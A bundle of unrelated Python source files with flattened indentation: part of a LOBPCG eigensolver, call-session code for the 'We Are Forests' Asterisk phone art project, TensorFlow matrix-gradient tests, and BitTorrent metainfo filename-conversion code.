raise NotImplementedError('The dense eigensolver '
'does not support constraints.')
# Define the closed range of indices of eigenvalues to return.
if largest:
eigvals = (n - sizeX, n-1)
else:
eigvals = (0, sizeX-1)
A_dense = A(np.eye(n, dtype=A.dtype))
B_dense = None if B is None else B(np.eye(n, dtype=B.dtype))
vals, vecs = eigh(A_dense, B_dense, eigvals=eigvals,
check_finite=False)
if largest:
# Reverse order to be compatible with eigs() in 'LM' mode.
vals = vals[::-1]
vecs = vecs[:, ::-1]
return vals, vecs
if (residualTolerance is None) or (residualTolerance <= 0.0):
residualTolerance = np.sqrt(1e-15) * n
# Apply constraints to X.
if blockVectorY is not None:
if B is not None:
blockVectorBY = B(blockVectorY)
else:
blockVectorBY = blockVectorY
# gramYBY is a dense array.
gramYBY = np.dot(blockVectorY.T.conj(), blockVectorBY)
try:
# gramYBY is a Cholesky factor from now on...
gramYBY = cho_factor(gramYBY)
except LinAlgError as e:
raise ValueError('cannot handle linearly dependent constraints') from e
_applyConstraints(blockVectorX, gramYBY, blockVectorBY, blockVectorY)
##
# B-orthonormalize X.
blockVectorX, blockVectorBX = _b_orthonormalize(B, blockVectorX)
##
# Compute the initial Ritz vectors: solve the eigenproblem.
blockVectorAX = A(blockVectorX)
gramXAX = np.dot(blockVectorX.T.conj(), blockVectorAX)
_lambda, eigBlockVector = eigh(gramXAX, check_finite=False)
ii = _get_indx(_lambda, sizeX, largest)
_lambda = _lambda[ii]
eigBlockVector = np.asarray(eigBlockVector[:, ii])
blockVectorX = np.dot(blockVectorX, eigBlockVector)
blockVectorAX = np.dot(blockVectorAX, eigBlockVector)
if B is not None:
blockVectorBX = np.dot(blockVectorBX, eigBlockVector)
##
# Active index set.
activeMask = np.ones((sizeX,), dtype=bool)
lambdaHistory = [_lambda]
residualNormsHistory = []
previousBlockSize = sizeX
ident = np.eye(sizeX, dtype=A.dtype)
ident0 = np.eye(sizeX, dtype=A.dtype)
##
# Main iteration loop.
blockVectorP = None # set during iteration
blockVectorAP = None
blockVectorBP = None
iterationNumber = -1
restart = True
explicitGramFlag = False
while iterationNumber < maxiter:
iterationNumber += 1
if verbosityLevel > 0:
print('iteration %d' % iterationNumber)
if B is not None:
aux = blockVectorBX * _lambda[np.newaxis, :]
else:
aux = blockVectorX * _lambda[np.newaxis, :]
blockVectorR = blockVectorAX - aux
aux = np.sum(blockVectorR.conj() * blockVectorR, 0)
residualNorms = np.sqrt(aux)
residualNormsHistory.append(residualNorms)
ii = np.where(residualNorms > residualTolerance, True, False)
activeMask = activeMask & ii
if verbosityLevel > 2:
print(activeMask)
currentBlockSize = activeMask.sum()
if currentBlockSize != previousBlockSize:
previousBlockSize = currentBlockSize
ident = np.eye(currentBlockSize, dtype=A.dtype)
if currentBlockSize == 0:
break
if verbosityLevel > 0:
print('current block size:', currentBlockSize)
print('eigenvalue:', _lambda)
print('residual norms:', residualNorms)
if verbosityLevel > 10:
print(eigBlockVector)
activeBlockVectorR = _as2d(blockVectorR[:, activeMask])
if iterationNumber > 0:
activeBlockVectorP = _as2d(blockVectorP[:, activeMask])
activeBlockVectorAP = _as2d(blockVectorAP[:, activeMask])
if B is not None:
activeBlockVectorBP = _as2d(blockVectorBP[:, activeMask])
if M is not None:
# Apply preconditioner T to the active residuals.
activeBlockVectorR = M(activeBlockVectorR)
##
# Apply constraints to the preconditioned residuals.
if blockVectorY is not None:
_applyConstraints(activeBlockVectorR,
gramYBY, blockVectorBY, blockVectorY)
##
# B-orthogonalize the preconditioned residuals to X.
if B is not None:
activeBlockVectorR = activeBlockVectorR - np.matmul(blockVectorX,
np.matmul(blockVectorBX.T.conj(),
activeBlockVectorR))
else:
activeBlockVectorR = activeBlockVectorR - np.matmul(blockVectorX,
np.matmul(blockVectorX.T.conj(),
activeBlockVectorR))
##
# B-orthonormalize the preconditioned residuals.
aux = _b_orthonormalize(B, activeBlockVectorR)
activeBlockVectorR, activeBlockVectorBR = aux
activeBlockVectorAR = A(activeBlockVectorR)
if iterationNumber > 0:
if B is not None:
aux = _b_orthonormalize(B, activeBlockVectorP,
activeBlockVectorBP, retInvR=True)
activeBlockVectorP, activeBlockVectorBP, invR, normal = aux
else:
aux = _b_orthonormalize(B, activeBlockVectorP, retInvR=True)
activeBlockVectorP, _, invR, normal = aux
# Function _b_orthonormalize returns None if Cholesky fails
if activeBlockVectorP is not None:
activeBlockVectorAP = activeBlockVectorAP / normal
activeBlockVectorAP = np.dot(activeBlockVectorAP, invR)
restart = False
else:
restart = True
##
# Perform the Rayleigh Ritz Procedure:
# Compute symmetric Gram matrices:
if activeBlockVectorAR.dtype == 'float32':
myeps = 1
elif activeBlockVectorR.dtype == 'float32':
myeps = 1e-4
else:
myeps = 1e-8
if residualNorms.max() > myeps and not explicitGramFlag:
explicitGramFlag = False
else:
# Once explicitGramFlag, forever explicitGramFlag.
explicitGramFlag = True
# Shared memory assingments to simplify the code
if B is None:
blockVectorBX = blockVectorX
activeBlockVectorBR = activeBlockVectorR
if not restart:
activeBlockVectorBP = activeBlockVectorP
# Common submatrices:
gramXAR = np.dot(blockVectorX.T.conj(), activeBlockVectorAR)
gramRAR = np.dot(activeBlockVectorR.T.conj(), activeBlockVectorAR)
if explicitGramFlag:
gramRAR = (gramRAR + gramRAR.T.conj())/2
gramXAX = np.dot(blockVectorX.T.conj(), blockVectorAX)
gramXAX = (gramXAX + gramXAX.T.conj())/2
gramXBX = np.dot(blockVectorX.T.conj(), blockVectorBX)
gramRBR = np.dot(activeBlockVectorR.T.conj(), activeBlockVectorBR)
gramXBR = np.dot(blockVectorX.T.conj(), activeBlockVectorBR)
else:
gramXAX = np.diag(_lambda)
gramXBX = ident0
gramRBR = ident
gramXBR = np.zeros((sizeX, currentBlockSize), dtype=A.dtype)
def _handle_gramA_gramB_verbosity(gramA, gramB):
if verbosityLevel > 0:
_report_nonhermitian(gramA, 'gramA')
_report_nonhermitian(gramB, 'gramB')
if verbosityLevel > 10:
# Note: not documented, but leave it in here for now
np.savetxt('gramA.txt', gramA)
np.savetxt('gramB.txt', gramB)
if not restart:
gramXAP = np.dot(blockVectorX.T.conj(), activeBlockVectorAP)
gramRAP = np.dot(activeBlockVectorR.T.conj(), activeBlockVectorAP)
gramPAP = np.dot(activeBlockVectorP.T.conj(), activeBlockVectorAP)
gramXBP = np.dot(blockVectorX.T.conj(), activeBlockVectorBP)
gramRBP = np.dot(activeBlockVectorR.T.conj(), activeBlockVectorBP)
if explicitGramFlag:
gramPAP = (gramPAP + gramPAP.T.conj())/2
gramPBP = np.dot(activeBlockVectorP.T.conj(),
activeBlockVectorBP)
else:
gramPBP = ident
gramA = bmat([[gramXAX, gramXAR, gramXAP],
[gramXAR.T.conj(), gramRAR, gramRAP],
[gramXAP.T.conj(), gramRAP.T.conj(), gramPAP]])
gramB = bmat([[gramXBX, gramXBR, gramXBP],
[gramXBR.T.conj(), gramRBR, gramRBP],
[gramXBP.T.conj(), gramRBP.T.conj(), gramPBP]])
_handle_gramA_gramB_verbosity(gramA, gramB)
try:
_lambda, eigBlockVector = eigh(gramA, gramB,
check_finite=False)
except LinAlgError:
# try again after dropping the direction vectors P from RR
restart = True
if restart:
gramA = bmat([[gramXAX, gramXAR],
[gramXAR.T.conj(), gramRAR]])
gramB = bmat([[gramXBX, gramXBR],
[gramXBR.T.conj(), gramRBR]])
_handle_gramA_gramB_verbosity(gramA, gramB)
try:
_lambda, eigBlockVector = eigh(gramA, gramB,
check_finite=False)
except LinAlgError as e:
raise ValueError('eigh has failed in lobpcg iterations') from e
ii = _get_indx(_lambda, sizeX, largest)
if verbosityLevel > 10:
print(ii)
print(_lambda)
_lambda = _lambda[ii]
eigBlockVector = eigBlockVector[:, ii]
lambdaHistory.append(_lambda)
if verbosityLevel > 10:
print('lambda:', _lambda)
# # Normalize eigenvectors!
# aux = np.sum( eigBlockVector.conj() * eigBlockVector, 0 )
# eigVecNorms = np.sqrt( aux )
# eigBlockVector = eigBlockVector / eigVecNorms[np.newaxis, :]
# eigBlockVector, aux = _b_orthonormalize( B, eigBlockVector )
if verbosityLevel > 10:
print(eigBlockVector)
# Compute Ritz vectors.
if B is not None:
if not restart:
eigBlockVectorX = eigBlockVector[:sizeX]
eigBlockVectorR = eigBlockVector[sizeX:sizeX+currentBlockSize]
eigBlockVectorP = eigBlockVector[sizeX+currentBlockSize:]
pp = np.dot(activeBlockVectorR, eigBlockVectorR)
pp += np.dot(activeBlockVectorP, eigBlockVectorP)
app = np.dot(activeBlockVectorAR, eigBlockVectorR)
app += np.dot(activeBlockVectorAP, eigBlockVectorP)
bpp = np.dot(activeBlockVectorBR, eigBlockVectorR)
bpp += np.dot(activeBlockVectorBP, eigBlockVectorP)
else:
eigBlockVectorX = eigBlockVector[:sizeX]
eigBlockVectorR = eigBlockVector[sizeX:]
pp = np.dot(activeBlockVectorR, eigBlockVectorR)
app = np.dot(activeBlockVectorAR, eigBlockVectorR)
bpp = np.dot(activeBlockVectorBR, eigBlockVectorR)
if verbosityLevel > 10:
print(pp)
print(app)
print(bpp)
blockVectorX = np.dot(blockVectorX, eigBlockVectorX) + pp
blockVectorAX = np.dot(blockVectorAX, eigBlockVectorX) + app
blockVectorBX = np.dot(blockVectorBX, eigBlockVectorX) + bpp
blockVectorP, blockVectorAP, blockVectorBP = pp, app, bpp
else:
if not restart:
eigBlockVectorX = eigBlockVector[:sizeX]
eigBlockVectorR = eigBlockVector[sizeX:sizeX+currentBlockSize]
eigBlockVectorP = eigBlockVector[sizeX+currentBlockSize:]
pp = np.dot(activeBlockVectorR, eigBlockVectorR)
pp += np.dot(activeBlockVectorP, eigBlockVectorP)
app = np.dot(activeBlockVectorAR, eigBlockVectorR)
app += np.dot(activeBlockVectorAP, eigBlockVectorP)
else:
eigBlockVectorX = eigBlockVector[:sizeX]
eigBlockVectorR = eigBlockVector[sizeX:]
pp = np.dot(activeBlockVectorR, eigBlockVectorR)
app = np.dot(activeBlockVectorAR, eigBlockVectorR)
if verbosityLevel > 10:
print(pp)
print(app)
blockVectorX = np.dot(blockVectorX, eigBlockVectorX) + pp
blockVectorAX = np.dot(blockVectorAX, eigBlockVectorX) + app
blockVectorP, blockVectorAP = pp, app
if B is not None:
aux = blockVectorBX * _lambda[np.newaxis, :]
else:
aux = blockVectorX * _lambda[np.newaxis, :]
blockVectorR = blockVectorAX - aux
aux = np.sum(blockVectorR.conj() * blockVectorR, 0)
residualNorms = np.sqrt(aux)
# Future work: Need to add Postprocessing here:
# Making sure eigenvectors "exactly" satisfy the blockVectorY constrains?
# Making sure eigenvecotrs are "exactly" othonormalized by final "exact" RR
# Computing the actual true residuals
if verbosityLevel > 0:
print('final eigenvalue:', _lambda)
print('final residual norms:', residualNorms)
if retLambdaHistory:
if retResidualNormsHistory:
return _lambda, blockVectorX, lambdaHistory, residualNormsHistory
else:
return _lambda, blockVectorX, lambdaHistory
else:
if retResidualNormsHistory:
return _lambda, blockVectorX, residualNormsHistory
else:
return _lambda, blockVectorX
| |
# We Are Forests
# http://weareforests.com/
#
# a project by Duncan Speakman and Emilie Grenier
# -----------------------------------------------
#
# supported by Nederlands Instituut voor de Mediakunst - http://www.nimk.nl/
#
# Source code (c) 2011 Arjan Scherpenisse <arjan@scherpenisse.net>
# This code is released under the MIT license. See LICENSE for details.
import hashlib
import random
import time
from epsilon.extime import Time
from twisted.internet import reactor
from axiom.item import Item
from axiom.attributes import text, timestamp, integer, boolean, AND
from sparked import application
from weareforests.pqueue import PriorityQueue
class Recording (Item):
"""
A certain recording.
"""
created = timestamp()
caller_id = text()
filename = text()
duration = integer() # in frames
use_in_ending = boolean()
user_recording = boolean()
def filenameAsPath(self, app):
"""
Return absolute filename without extension
"""
return app.recordingsPath.child(self.filename).path
def filenameAsURL(self):
"""
Return filename as MP3 url
"""
return "/recordings/" + self.filename + ".mp3"
def filenameAsAsterisk(self):
return "weareforests-recordings/%s" % self.filename
@staticmethod
def userRecordingFilename(app):
"""
Generate a new filename for a user recording.
"""
base = "user-%d" % time.time()
fn = base
f = app.recordingsPath.child(fn)
i = 1
while f.exists():
fn = base+("-%d"%i)
f = app.recordingsPath.child(fn)
i += 1
return fn
class CallerSession (object):
digit = ord("1")
app = None
agi = None
queue = None
isReconnect = False
# info
channel = None
callerId = None
timeStarted = None
# conference user id
conferenceUserId = None
isLivePhone = False
# state machine
state = None
def __init__(self, app, agi, isReconnect):
self.app = app
self.agi = agi
self.isReconnect = self.isReconnect or isReconnect
self.queue = PriorityQueue()
print self.agi.variables
self.callerId = unicode(self.agi.variables['agi_callerid'])
self.channel = self.agi.variables['agi_channel']
self.timeStarted = Time()
print "New session from", self.callerId
self.state = application.StateMachine(self, verbose=1)
script = self.agi.variables.get('agi_network_script', None)
if script == 'DialOut':
self.state.set("pending_start")
else:
self.state.set("start")
def reEntry(self, agi, isReconnect):
self.agi = agi
self.isReconnect = self.isReconnect or isReconnect
if self.state.get == 'to_recording':
self.setStateAfterSample("recording", "weareforests-audio/record")
if self.state.get == 'to_play':
self.state.set('play')
if self.state.get == 'to_start':
self.state.set('start')
if self.state.get == 'to_ending':
self.queue = PriorityQueue()
for f in [r.filenameAsAsterisk() for r in self.app.store.query(Recording, Recording.use_in_ending == True, sort=Recording.created.descending)]:
self.queueAdd(f)
self.state.set('ending')
def enter_ending(self):
if self.queue.isEmpty():
self.state.set("ended")
self.app.pingWebSessions()
return
item = self.queue.pop()
self.app.pingWebSessions()
self.setStateAfterSample("ending", item)
def enter_ended(self):
self.setStateAfterSample("ended", "weareforests-audio/silent")
def queueAdd(self, r):
self.queue.append(10, r)
def queueAddFirst(self, r):
self.queue.append(5, r)
def enter_start(self):
if self.isReconnect:
self.agi.finish()
self.app.transferToConference(self)
return
for f in self.app.getInitialQueue():
self.queueAdd(f)
self.state.set("play")
def enter_play(self, recording=None, offset=0):
"""
A recording has finished or a previous sample has finished;
choose a new recording to play.
"""
self.app.pingWebSessions()
# look up the next recording
if not recording:
if self.queue.isEmpty():
# if no recording, transfer to conference
self.agi.finish()
self.app.transferToConference(self)
current = "weareforests-audio/silent"
else:
current = self.queue.pop()
else:
current = recording
print "Playing recording: %s, offset %d" % (current, offset)
d = self.agi.streamFile(str(current), chr(self.digit), offset)
def audioDone(r):
digit, offset = r
if digit == self.digit:
self.setStateAfterSample("recording", "weareforests-audio/record", current, offset)
else:
self.state.set("play")
d.addCallback(audioDone)
d.addErrback(self.catchHangup)
def enter_recording(self, currentlyPlaying=None, offset=0):
"""
User has pressed '1' to start the recording.
"""
self.app.pingWebSessions()
start = Time()
filename = Recording.userRecordingFilename(self.app)
d = self.agi.recordFile("weareforests-recordings/" + filename, "gsm", chr(self.digit), 45)
def save(r):
digit, tpe, duration = r
duration = duration / 8000
rec = Recording(store=self.app.store, filename=unicode(filename), created=start, caller_id=self.callerId, duration=duration, user_recording=True)
print "saved!"
if tpe == 'hangup':
print "user hung up during recording."
self.app.sessionEnded(self.channel)
# add it to everybody's queue
self.app.recordingAdded(self, rec)
# resume play where we stopped
self.setStateAfterSample("play", "weareforests-audio/listen", currentlyPlaying, offset)
d.addCallback(save)
d.addErrback(self.catchHangup)
def setStateAfterSample(self, state, sample, *args):
d = self.agi.streamFile(str(sample), "", 0)
def audioDone(r):
print "audio done"
self.state.set(state, *args)
d.addCallback(audioDone)
d.addErrback(self.catchHangup)
def catchHangup(self, f):
self.queue.empty()
self.agi.finish()
if self.state.get[:3] == 'to_':
return
print "***", f
self.app.sessionEnded(self.channel)
def enter_pending_start(self, count=10):
"""
Press 1 to start
"""
self.app.pingWebSessions()
if count == 0:
self.app.admin.hangup(self.channel)
d = self.agi.streamFile("weareforests-audio/welcome", chr(self.digit))
def audioDone(r):
digit, offset = r
if digit == self.digit:
self.setStateAfterSample("start", "weareforests-audio/shortsilence")
else:
self.state.set("pending_start", count-1)
d.addCallback(audioDone)
d.addErrback(self.catchHangup)
| |
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tensorflow.ops.linalg_grad."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.python.framework import constant_op
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import gradient_checker
from tensorflow.python.ops import gradients_impl
from tensorflow.python.ops import linalg_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops.linalg import linalg_impl
from tensorflow.python.platform import test as test_lib
def _AddTest(test, op_name, testcase_name, fn):
test_name = '_'.join(['test', op_name, testcase_name])
if hasattr(test, test_name):
raise RuntimeError('Test %s defined more than once' % test_name)
setattr(test, test_name, fn)
class ShapeTest(test_lib.TestCase):
def testBatchGradientUnknownSize(self):
with self.cached_session():
batch_size = constant_op.constant(3)
matrix_size = constant_op.constant(4)
batch_identity = array_ops.tile(
array_ops.expand_dims(
array_ops.diag(array_ops.ones([matrix_size])), 0),
[batch_size, 1, 1])
determinants = linalg_ops.matrix_determinant(batch_identity)
reduced = math_ops.reduce_sum(determinants)
sum_grad = gradients_impl.gradients(reduced, batch_identity)[0]
self.assertAllClose(batch_identity.eval(), self.evaluate(sum_grad))
class MatrixUnaryFunctorGradientTest(test_lib.TestCase):
pass # Filled in below
def _GetMatrixUnaryFunctorGradientTest(functor_, dtype_, shape_, **kwargs_):
def Test(self):
with self.session(use_gpu=True):
np.random.seed(1)
a_np = np.random.uniform(
low=-1.0, high=1.0,
size=np.prod(shape_)).reshape(shape_).astype(dtype_)
a = constant_op.constant(a_np)
if functor_.__name__ == 'matrix_square_root':
# Square the input matrix to ensure that its matrix square root exists
a = math_ops.matmul(a, a)
a_np = self.evaluate(a)
b = functor_(a, **kwargs_)
# Optimal stepsize for central difference is O(epsilon^{1/3}).
epsilon = np.finfo(dtype_).eps
delta = epsilon**(1.0 / 3.0)
# tolerance obtained by looking at actual differences using
# np.linalg.norm(theoretical-numerical, np.inf) on -mavx build
tol = 1e-6 if dtype_ == np.float64 else 0.05
theoretical, numerical = gradient_checker.compute_gradient(
a,
a.get_shape().as_list(),
b,
b.get_shape().as_list(),
x_init_value=a_np,
delta=delta)
self.assertAllClose(theoretical, numerical, atol=tol, rtol=tol)
return Test
class MatrixBinaryFunctorGradientTest(test_lib.TestCase):
pass # Filled in below
def _GetMatrixBinaryFunctorGradientTest(functor_,
dtype_,
shape_,
float32_tol_fudge=1.0,
**kwargs_):
def Test(self):
# TODO(rmlarsen): Debug illegal address bug on CUDA and re-enable
# GPU test for matrix_solve.
use_gpu = False if functor_ == linalg_ops.matrix_solve else True
with self.session(use_gpu=use_gpu):
np.random.seed(1)
a_np = np.random.uniform(
low=-1.0, high=1.0,
size=np.prod(shape_)).reshape(shape_).astype(dtype_)
a = constant_op.constant(a_np)
b_np = np.random.uniform(
low=-1.0, high=1.0,
size=np.prod(shape_)).reshape(shape_).astype(dtype_)
b = constant_op.constant(b_np)
c = functor_(a, b, **kwargs_)
# Optimal stepsize for central difference is O(epsilon^{1/3}).
epsilon = np.finfo(dtype_).eps
delta = epsilon**(1.0 / 3.0)
# tolerance obtained by looking at actual differences using
# np.linalg.norm(theoretical-numerical, np.inf) on -mavx build
tol = 1e-6 if dtype_ == np.float64 else float32_tol_fudge * 0.05
# The gradients for a and b may be of very different magnitudes,
# so to not get spurious failures we test them separately.
for factor, factor_init in [a, a_np], [b, b_np]:
theoretical, numerical = gradient_checker.compute_gradient(
factor,
factor.get_shape().as_list(),
c,
c.get_shape().as_list(),
x_init_value=factor_init,
delta=delta)
self.assertAllClose(theoretical, numerical, atol=tol, rtol=tol)
return Test
if __name__ == '__main__':
# Tests for gradients of binary matrix operations.
for dtype in np.float32, np.float64:
for size in 2, 5, 10:
# We skip the rank 4, size 10 case: it is slow and conceptually covered
# by the other cases.
for extra in [(), (2,), (3,)] + [(3, 2)] * (size < 10):
for adjoint in False, True:
shape = extra + (size, size)
name = '%s_%s_adj_%s' % (dtype.__name__, '_'.join(map(str, shape)),
str(adjoint))
_AddTest(MatrixBinaryFunctorGradientTest, 'MatrixSolveGradient', name,
_GetMatrixBinaryFunctorGradientTest(
linalg_ops.matrix_solve, dtype, shape, adjoint=adjoint))
for lower in True, False:
name = '%s_low_%s' % (name, lower)
_AddTest(MatrixBinaryFunctorGradientTest,
'MatrixTriangularSolveGradient', name,
_GetMatrixBinaryFunctorGradientTest(
linalg_ops.matrix_triangular_solve,
dtype,
shape,
float32_tol_fudge=4.0,
adjoint=adjoint,
lower=lower))
# Tests for gradients of unary matrix operations.
for dtype in np.float32, np.float64:
for size in 2, 5, 10:
# We skip the rank 4, size 10 case: it is slow and conceptually covered
# by the other cases.
for extra in [(), (2,), (3,)] + [(3, 2)] * (size < 10):
shape = extra + (size, size)
name = '%s_%s' % (dtype.__name__, '_'.join(map(str, shape)))
_AddTest(MatrixUnaryFunctorGradientTest, 'MatrixInverseGradient', name,
_GetMatrixUnaryFunctorGradientTest(linalg_ops.matrix_inverse,
dtype, shape))
_AddTest(MatrixUnaryFunctorGradientTest, 'MatrixExponentialGradient',
name,
_GetMatrixUnaryFunctorGradientTest(
linalg_impl.matrix_exponential, dtype, shape))
_AddTest(
MatrixUnaryFunctorGradientTest, 'MatrixDeterminantGradient', name,
_GetMatrixUnaryFunctorGradientTest(linalg_ops.matrix_determinant,
dtype, shape))
_AddTest(
MatrixUnaryFunctorGradientTest, 'LogMatrixDeterminantGradient',
name,
_GetMatrixUnaryFunctorGradientTest(
lambda x: linalg_ops.log_matrix_determinant(x)[1],
dtype, shape))
# The numerical Jacobian is consistently invalid for these four shapes
# because the matrix square root of the perturbed input doesn't exist
if shape in {(2, 5, 5), (3, 5, 5), (3, 10, 10), (3, 2, 5, 5)}:
# Alternative shape that consistently produces a valid numerical Jacobian
shape = extra + (size + 1, size + 1)
name = '%s_%s' % (dtype.__name__, '_'.join(map(str, shape)))
_AddTest(
MatrixUnaryFunctorGradientTest, 'MatrixSquareRootGradient', name,
_GetMatrixUnaryFunctorGradientTest(linalg_ops.matrix_square_root,
dtype, shape))
# Tests for gradients of matrix_solve_ls
for dtype in np.float32, np.float64:
for rows in 2, 5, 10:
for cols in 2, 5, 10:
for l2_regularization in 1e-6, 0.001, 1.0:
shape = (rows, cols)
name = '%s_%s_%s' % (dtype.__name__, '_'.join(map(str, shape)),
l2_regularization)
_AddTest(
MatrixBinaryFunctorGradientTest,
'MatrixSolveLsGradient',
name,
# pylint: disable=long-lambda,g-long-lambda
_GetMatrixBinaryFunctorGradientTest(
(lambda a, b, l=l2_regularization:
linalg_ops.matrix_solve_ls(a, b, l)),
dtype,
shape,
float32_tol_fudge=4.0))
test_lib.main()
| |
# The contents of this file are subject to the BitTorrent Open Source License
# Version 1.1 (the License). You may not copy or use this file, in either
# source code or executable form, except in compliance with the License. You
# may obtain a copy of the License at http://www.bittorrent.com/license/.
#
# Software distributed under the License is distributed on an AS IS basis,
# WITHOUT WARRANTY OF ANY KIND, either express or implied. See the License
# for the specific language governing rights and limitations under the
# License.
# Written by Uoti Urpala
# required for Python 2.2
from __future__ import generators
import os
import sys
try:
from hashlib import sha1 as sha
except ImportError:
from sha import sha
from BitTorrent.obsoletepythonsupport import *
from BitTorrent.bencode import bencode
from BitTorrent import btformats
from BitTorrent import BTFailure, WARNING, ERROR
WINDOWS_UNSUPPORTED_CHARS ='"*/:<>?\|'
windows_translate = [chr(i) for i in range(256)]
for x in WINDOWS_UNSUPPORTED_CHARS:
windows_translate[ord(x)] = '-'
windows_translate = ''.join(windows_translate)
noncharacter_translate = {}
for i in range(0xD800, 0xE000):
noncharacter_translate[i] = ord('-')
for i in range(0xFDD0, 0xFDF0):
noncharacter_translate[i] = ord('-')
for i in (0xFFFE, 0xFFFF):
noncharacter_translate[i] = ord('-')
del x, i
def set_filesystem_encoding(encoding, errorfunc):
global filesystem_encoding
filesystem_encoding = 'ascii'
if encoding == '':
try:
sys.getfilesystemencoding
except AttributeError:
errorfunc(WARNING,
_("This seems to be an old Python version which "
"does not support detecting the filesystem "
"encoding. Assuming 'ascii'."))
return
encoding = sys.getfilesystemencoding()
if encoding is None:
errorfunc(WARNING,
_("Python failed to autodetect filesystem encoding. "
"Using 'ascii' instead."))
return
try:
'a1'.decode(encoding)
except:
errorfunc(ERROR,
_("Filesystem encoding '%s' is not supported. "
"Using 'ascii' instead.") % encoding)
return
filesystem_encoding = encoding
def generate_names(name, is_dir):
if is_dir:
prefix = name + '.'
suffix = ''
else:
pos = name.rfind('.')
if pos == -1:
pos = len(name)
prefix = name[:pos] + '.'
suffix = name[pos:]
i = 0
while True:
yield prefix + str(i) + suffix
i += 1
class ConvertedMetainfo(object):
def __init__(self, metainfo):
self.bad_torrent_wrongfield = False
self.bad_torrent_unsolvable = False
self.bad_torrent_noncharacter = False
self.bad_conversion = False
self.bad_windows = False
self.bad_path = False
self.reported_errors = False
self.is_batch = False
self.orig_files = None
self.files_fs = None
self.total_bytes = 0
self.sizes = []
self.comment = None
btformats.check_message(metainfo, check_paths=False)
info = metainfo['info']
if info.has_key('length'):
self.total_bytes = info['length']
self.sizes.append(self.total_bytes)
else:
self.is_batch = True
r = []
self.orig_files = []
self.sizes = []
i = 0
for f in info['files']:
l = f['length']
self.total_bytes += l
self.sizes.append(l)
path = self._get_attr_utf8(f, 'path')
for x in path:
if not btformats.allowed_path_re.match(x):
if l > 0:
raise BTFailure(_("Bad file path component: ")+x)
# BitComet makes bad .torrent files with empty
# filename part
self.bad_path = True
break
else:
p = []
for x in path:
p.append((self._enforce_utf8(x), x))
path = p
self.orig_files.append('/'.join([x[0] for x in path]))
k = []
for u,o in path:
tf2 = self._to_fs_2(u)
k.append((tf2, u, o))
r.append((k,i))
i += 1
# If two or more file/subdirectory names in the same directory
# would map to the same name after encoding conversions + Windows
# workarounds, change them. Files are changed as
# 'a.b.c'->'a.b.0.c', 'a.b.1.c' etc, directories or files without
# '.' as 'a'->'a.0', 'a.1' etc. If one of the multiple original
# names was a "clean" conversion, that one is always unchanged
# and the rest are adjusted.
r.sort()
self.files_fs = [None] * len(r)
prev = [None]
res = []
stack = [{}]
for x in r:
j = 0
x, i = x
while x[j] == prev[j]:
j += 1
del res[j:]
del stack[j+1:]
name = x[j][0][1]
if name in stack[-1]:
for name in generate_names(x[j][1], j != len(x) - 1):
name = self._to_fs(name)
if name not in stack[-1]:
break
stack[-1][name] = None
res.append(name)
for j in range(j + 1, len(x)):
name = x[j][0][1]
stack.append({name: None})
res.append(name)
self.files_fs[i] = os.path.join(*res)
prev = x
self.name = self._get_field_utf8(info, 'name')
self.name_fs = self._to_fs(self.name)
self.piece_length = info['piece length']
self.is_trackerless = False
if metainfo.has_key('announce'):
self.announce = metainfo['announce']
elif metainfo.has_key('nodes'):
self.is_trackerless = True
self.nodes = metainfo['nodes']
if metainfo.has_key('comment'):
self.comment = metainfo['comment']
self.hashes = [info['pieces'][x:x+20] for x in xrange(0,
len(info['pieces']), 20)]
self.infohash = sha(bencode(info)).digest()
def show_encoding_errors(self, errorfunc):
self.reported_errors = True
if self.bad_torrent_unsolvable:
errorfunc(ERROR,
_("This .torrent file has been created with a broken "
"tool and has incorrectly encoded filenames. Some or "
"all of the filenames may appear different from what "
"the creator of the .torrent file intended."))
elif self.bad_torrent_noncharacter:
errorfunc(ERROR,
_("This .torrent file has been created with a broken "
"tool and has bad character values that do not "
"correspond to any real character. Some or all of the "
"filenames may appear different from what the creator "
"of the .torrent file intended."))
elif self.bad_torrent_wrongfield:
errorfunc(ERROR,
_("This .torrent file has been created with a broken "
"tool and has incorrectly encoded filenames. The "
"names used may still be correct."))
elif self.bad_conversion:
errorfunc(WARNING,
_('The character set used on the local filesystem ("%s") '
'cannot represent all characters used in the '
'filename(s) of this torrent. Filenames have been '
'changed from the original.') % filesystem_encoding)
elif self.bad_windows:
errorfunc(WARNING,
_("The Windows filesystem cannot handle some "
"characters used in the filename(s) of this torrent. "
"Filenames have been changed from the original."))
elif self.bad_path:
errorfunc(WARNING,
_("This .torrent file has been created with a broken "
"tool and has at least 1 file with an invalid file "
"or directory name. However since all such files "
"were marked as having length 0 those files are "
"just ignored."))
# At least BitComet seems to make bad .torrent files that have
# fields in an arbitrary encoding but separate 'field.utf-8' attributes
def _get_attr_utf8(self, d, attrib):
v = d.get(attrib + '.utf-8')
if v is not None:
if v != d[attrib]:
self.bad_torrent_wrongfield = True
else:
v = d[attrib]
return v
def _enforce_utf8(self, s):
try:
s = s.decode('utf-8')
except:
self.bad_torrent_unsolvable = True
s = s.decode('utf-8', 'replace')
t = s.translate(noncharacter_translate)
if t != s:
self.bad_torrent_noncharacter = True
return t.encode('utf-8')
def _get_field_utf8(self, d, attrib):
r = self._get_attr_utf8(d, attrib)
return self._enforce_utf8(r)
def _fix_windows(self, name, t=windows_translate):
bad = False
r = name.translate(t)
# for some reason name cannot end with '.' or space
if r[-1] in '. ':
r = r + '-'
if r != name:
self.bad_windows = True
bad = True
return (r, bad)
def _to_fs(self, name):
return self._to_fs_2(name)[1]
def _to_fs_2(self, name):
bad = False
if sys.platform.startswith('win'):
name, bad = self._fix_windows(name)
name = name.decode('utf-8')
try:
r = name.encode(filesystem_encoding)
except:
self.bad_conversion = True
bad = True
r = name.encode(filesystem_encoding, 'replace')
if sys.platform.startswith('win'):
# encoding to mbcs with or without 'replace' will make the
# name unsupported by windows again because it adds random
# '?' characters which are invalid windows filesystem
# character
r, bad = self._fix_windows(r)
return (bad, r)
| |
import yaml
